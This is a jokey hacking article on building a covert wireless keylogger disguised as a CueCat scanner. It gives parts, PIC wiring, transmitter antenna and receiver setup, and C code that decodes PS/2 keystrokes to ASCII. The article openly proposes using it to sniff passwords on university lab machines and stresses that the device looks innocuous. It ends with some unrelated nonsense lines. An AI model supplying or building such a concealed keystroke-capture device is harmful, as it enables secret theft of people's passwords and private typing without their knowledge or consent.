Many people seem to enjoy hacking cuecats. But what about hacking USING cuecats? Afroman finally got off his ass and wrote up an article on
Wireless keyboard sniffing with the help of cuecats
Certain requirements must be met if you want to cheaply build something that wirelessly transmits someone's keystrokes. The device has to plug into the PS/2 port of a machine, in parallel with the keyboard, and it has to look as unsuspicious as possible and be as cool as Arnold in Twins. Something that looks like it was meant to be plugged in with the keyboard all along.. hmm.. a cuecat!
This mod could be used to sniff passwords in your university's computer clusters, but its most important purpose is to finally find a use for these fucking pieces of junk.
Linx TXM-433-LC or TXM-433-LR transmitter and the matching RXM-433-LC/LR receiver. You can get them at Digikey for about $21 total.
10 MHz crystal. Rip one out of an old motherboard or something.
MAX233, free sample from Maxim. (Not the magazine, but still pretty sexy)
PIC16F84A free sampled from the very generous Microchip. I used the PIC16F84A-04/P version.
Female D-sub 9 connector
A PIC programmer
This diagram shows the connection points you will need to make on the cuecat. Tapping the +5v and ground will power the microcontroller and the transmitter, while the clock and data lines will contain the encoded data of the keypresses. Do not sever any of the cuecat's wires here! Just make connections to the underside of the connector, or the exposed bits of metal you can see on the wires.
Program the PIC using this hex file before you make any of the above connections. The Linx datasheet says you should connect each and every one of the pins marked GND to ground, so you had better listen to them or they might eat your parents. None of the resistor values in this diagram are critical; anything from 1k to 20k should be fine. For a ghetto half-wave monopole antenna, just cut 33cm of wire and solder it to pin 5 of the transmitter chip (a half wavelength at 433 MHz is about 35cm, so a centimetre or two either way won't hurt). It doesn't matter which way around you connect the 10 MHz crystal, just like it doesn't matter if you're black or white HIIII Hiiiiii. If you buy the PIC instead of sampling it, note that the -04/P suffix is the 4 MHz speed grade; the -20/P is the grade Microchip rates for a 10 MHz crystal.
The receiver half needs 5V to operate, which you can take from your PC's power supply or create using a 9V battery and a 7805. Use the same style antenna you did for the transmitter. Only two wires go to the serial connector: ground, and the output from the MAX233. The diagram depicts the connections you make when viewing the soldering side of the 9-pin connector. Connect the receiver to a serial port on your machine and pop open HyperTerminal and/or a boner. Set it to 2400bps, 8 data bits, no parity, 1 stop bit, no flow control. Plug the cuecat into a nearby PC that you want to h4x and you should now be able to see what people are typing/wanking to.
How it verks
The PIC intercepts the keystrokes according to the PS/2 protocol. The keyboard doesn't send ASCII, it sends scan codes (0x1C for 'a', for example, plus a 0xF0 prefix when the key is released), so the PIC decodes them to the corresponding ASCII value and spits the ASCII character out through the asynchronous transmitter as plain 2400bps 8N1 serial. The receiver picks up the signal and farts out the same datastream as 0 to 5V pulses, which your PC's serial port can't understand. The MAX233 converts the 0 to 5V signal into a +/-10V signal so the serial port is happy. That goes to pin 2 on the connector, which is the receive data pin for the serial port.
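Here is the decode the PIC has to do, written as a host-side C model. This is an added example, not the page's PIC source or hex file: it reassembles the 11-bit PS/2 frames sampled off the clock and data lines (start bit, 8 data bits LSB first, odd parity, stop bit), drops frames that fail the checks, strips the 0xF0 break and 0xE0 extended prefixes so key releases and arrow keys don't turn into garbage, tracks Shift, and maps scan code set 2 to ASCII. The keymap subset, the US-layout shifted characters and the sample keystroke traffic are constructed for the example.

```c
/* ps2_sniff.c: model of the PIC's job, decode PS/2 keyboard frames to ASCII.
 * Added example, not the page's PIC firmware.  Build: cc -std=c99 ps2_sniff.c */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PS2_FRAME_BITS 11   /* start(0), 8 data LSB-first, odd parity, stop(1) */

typedef struct {
    int     nbits;      /* bits seen so far in the current frame */
    uint8_t data;       /* data bits assembled LSB first */
    int     ones;       /* 1-bits in data, for the odd-parity check */
    bool    release;    /* previous byte was the 0xF0 break prefix */
    bool    extended;   /* previous byte was the 0xE0 prefix */
    bool    shift;      /* a Shift key is held */
} ps2_dec;

/* Scan code set 2 make codes with plain/shifted ASCII (US layout).
 * Constructed subset for the example; anything not listed is ignored. */
static const struct { uint8_t code; char plain, shifted; } keymap[] = {
    {0x1C,'a','A'},{0x32,'b','B'},{0x21,'c','C'},{0x23,'d','D'},{0x24,'e','E'},{0x2B,'f','F'},
    {0x34,'g','G'},{0x33,'h','H'},{0x43,'i','I'},{0x3B,'j','J'},{0x42,'k','K'},{0x4B,'l','L'},
    {0x3A,'m','M'},{0x31,'n','N'},{0x44,'o','O'},{0x4D,'p','P'},{0x15,'q','Q'},{0x2D,'r','R'},
    {0x1B,'s','S'},{0x2C,'t','T'},{0x3C,'u','U'},{0x2A,'v','V'},{0x1D,'w','W'},{0x22,'x','X'},
    {0x35,'y','Y'},{0x1A,'z','Z'},{0x45,'0',')'},{0x16,'1','!'},{0x1E,'2','@'},{0x26,'3','#'},
    {0x25,'4','$'},{0x2E,'5','%'},{0x36,'6','^'},{0x3D,'7','&'},{0x3E,'8','*'},{0x46,'9','('},
    {0x29,' ',' '},{0x5A,'\n','\n'},{0x0D,'\t','\t'},{0x66,'\b','\b'},
};

/* Feed one DATA sample taken on a falling CLK edge.  Returns 1 (and stores the
 * byte) when a valid frame completes, -1 if the frame fails the start/parity/stop
 * checks and is dropped, 0 while still collecting bits.  A real host would also
 * wait for CLK to idle high before resyncing; this model just resets. */
int ps2_feed_bit(ps2_dec *d, int bit, uint8_t *out)
{
    int idx = d->nbits++;
    if (idx == 0) {                                   /* start bit must be 0 */
        d->data = 0; d->ones = 0;
        if (bit != 0) { d->nbits = 0; return -1; }
        return 0;
    }
    if (idx <= 8) {                                   /* data bits, LSB first */
        if (bit) { d->data |= (uint8_t)(1u << (idx - 1)); d->ones++; }
        return 0;
    }
    if (idx == 9) {                                   /* odd parity over data+parity */
        if (((d->ones + bit) & 1) == 0) { d->nbits = 0; return -1; }
        return 0;
    }
    d->nbits = 0;                                     /* idx 10: stop bit must be 1 */
    if (bit != 1) return -1;
    *out = d->data;
    return 1;
}

/* Feed one received scan code.  Returns 1 and stores an ASCII char for a key press
 * we can map; 0 for prefixes, key releases, Shift itself and unmapped keys. */
int ps2_feed_code(ps2_dec *d, uint8_t code, char *out)
{
    if (code == 0xF0) { d->release = true;  return 0; }   /* break (key-up) prefix */
    if (code == 0xE0) { d->extended = true; return 0; }   /* extended-key prefix */
    bool rel = d->release, ext = d->extended;
    d->release = d->extended = false;
    if (!ext && (code == 0x12 || code == 0x59)) { d->shift = !rel; return 0; }
    if (rel || ext) return 0;   /* key-up, or arrows/right Ctrl etc: no character */
    for (size_t i = 0; i < sizeof keymap / sizeof keymap[0]; i++)
        if (keymap[i].code == code) { *out = d->shift ? keymap[i].shifted : keymap[i].plain; return 1; }
    return 0;
}

/* The 11 bits a keyboard clocks out for one byte; used to build sample traffic. */
void ps2_make_frame(uint8_t byte, int bits[PS2_FRAME_BITS])
{
    int ones = 0;
    bits[0] = 0;
    for (int i = 0; i < 8; i++) { bits[1 + i] = (byte >> i) & 1; ones += bits[1 + i]; }
    bits[9] = (ones & 1) ? 0 : 1;                     /* odd parity */
    bits[10] = 1;
}

/* Run a sampled bit stream through both stages into a text buffer. */
size_t ps2_sniff(const int *bits, size_t nbits, char *text, size_t cap, size_t *dropped)
{
    ps2_dec d = {0};
    size_t n = 0, bad = 0;
    for (size_t i = 0; i < nbits; i++) {
        uint8_t b = 0; char c = 0;
        int r = ps2_feed_bit(&d, bits[i], &b);
        if (r < 0) bad++;
        else if (r == 1 && ps2_feed_code(&d, b, &c) == 1 && n + 1 < cap) text[n++] = c;
    }
    text[n] = '\0';
    if (dropped) *dropped = bad;
    return n;
}

/* Constructed sample traffic: typing "aB1", Right Arrow, space, then 'd' whose
 * frame gets a bad stop bit, the sort of glitch a noisy tap produces. */
static const uint8_t demo_codes[] = {
    0x1C, 0xF0, 0x1C,                    /* a down, a up */
    0x12, 0x32, 0xF0, 0x32, 0xF0, 0x12,  /* Shift down, b down/up, Shift up: 'B' */
    0x16, 0xF0, 0x16,                    /* '1' */
    0xE0, 0x74, 0xE0, 0xF0, 0x74,        /* Right Arrow (extended): ignored */
    0x29,                                /* space */
    0x23, 0xF0, 0x23,                    /* 'd' (frame corrupted below), d up */
};

const char *ps2_demo(size_t *dropped)
{
    static int  bits[sizeof demo_codes * PS2_FRAME_BITS];
    static char text[64];
    size_t n = 0; bool corrupted = false;
    for (size_t i = 0; i < sizeof demo_codes; i++) {
        ps2_make_frame(demo_codes[i], &bits[n]);
        if (!corrupted && demo_codes[i] == 0x23) { bits[n + 10] = 0; corrupted = true; }
        n += PS2_FRAME_BITS;
    }
    ps2_sniff(bits, n, text, sizeof text, dropped);
    return text;   /* "aB1 " with one frame dropped */
}

size_t ps2_demo_dropped(void) { size_t d = 0; ps2_demo(&d); return d; }

int main(void)
{
    size_t dropped = 0;
    const char *t = ps2_demo(&dropped);
    printf("sniffed: \"%s\" (%zu frames dropped)\n", t, dropped);
    return 0;
}
```

The two things worth copying into real firmware are the break-prefix handling (without it every key shows up twice, once on press and once on release) and dropping frames that fail parity or stop-bit checks rather than forwarding garbage over the radio; on the PIC the bits arrive from a falling-edge interrupt on the clock line instead of an array, but the state machine is the same.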
The source code is here
Here's my cuecat transmitter, with the antenna popping an orange boner. With it curled up inside and the cover on, it looks indistinguishable from a normal cuecat, and the LED still works too.
Number of friends before: 0
Number of friends after: 1 (a restraining order)
Amount of fur before: 6 CFM
Ariel has red hair